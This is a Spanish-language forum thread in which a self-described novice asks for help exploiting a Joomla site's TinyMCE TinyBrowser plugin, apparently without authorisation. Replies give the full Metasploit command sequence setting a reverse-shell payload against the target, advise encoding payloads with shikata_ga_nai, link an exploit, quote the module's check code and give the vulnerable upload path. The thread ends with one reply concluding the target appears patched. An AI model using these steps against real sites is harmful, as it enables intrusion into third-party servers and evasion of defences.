Hola a todos :) he analizado una pagina en joomla y me dice que este plugin TinyMCE TinyBrowser (creo que es plugin xD ) es vulnerable entonces voy a metasploit y hay un exploit para ese pero al lanzarlo me da este error "[-] Error retrieving obfuscation code!" :-X no se a que se refiere asi que si alguien sabe que me ayude un poco :-[
Mmmm podrías decirme el nombre del exploit? es este?
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST MIIP
msf exploit(joomla_tinybrowser) > set RHOST OBJETIVO
msf exploit(joomla_tinybrowser) > exploit
Pones todos los datos correctamente?
Puedes ver el código desde aquí y así ves donde te salta el error: http://www.exploit-db.com/exploits/9926/
Un saludo.
Lo que tienes que hacer es ofuscar el codigo, de tu payload ya que eso es lo que necesitas.
Regards,
Snifer
Este es "exploit/unix/webapp/joomla_tinybrowser" y como puedo ofuscar el codigo?? ??? soy muy novato
Te dije el payload -_-! que ofusques revisa sobre MSFVENOM MSFENCODE ;)
Encoding: x86/shikata_ga_nai este es el mas usado
Regards,
Snifer
jajaja ok ;D gracias por responder :)
No de echo el error lo que marca es que la ofuscacion de codigo fallo asi que tienes que desactivarla xD, eso es comun por que no funciona con php xD
asi que es un error del metasploit solo quita esa opcion y mandalo directo y jala tambien el tiny se puede hacer explotacion a mano :p no es nada dificil
:o Me puedes pasar el exploit o explicarme como hacerlo a mano ;D
Bien nadie le dio una leida al codigo, lo que sale aqui es que esta parchado
if (res)
if(res.body =~ /"obfus", "((\w)+)"\)/)
obfuscation_code = $1
print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
else
print_error("Error retrieving obfuscation code!")
return
end
end
por eso te sale del codigo de ofuscacion y muere es un codigo que se ocupa para que sea valida la peticion si entras manualmente al lugar te va a mandar al cuerno en pocas palabras esta parchado http://target/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=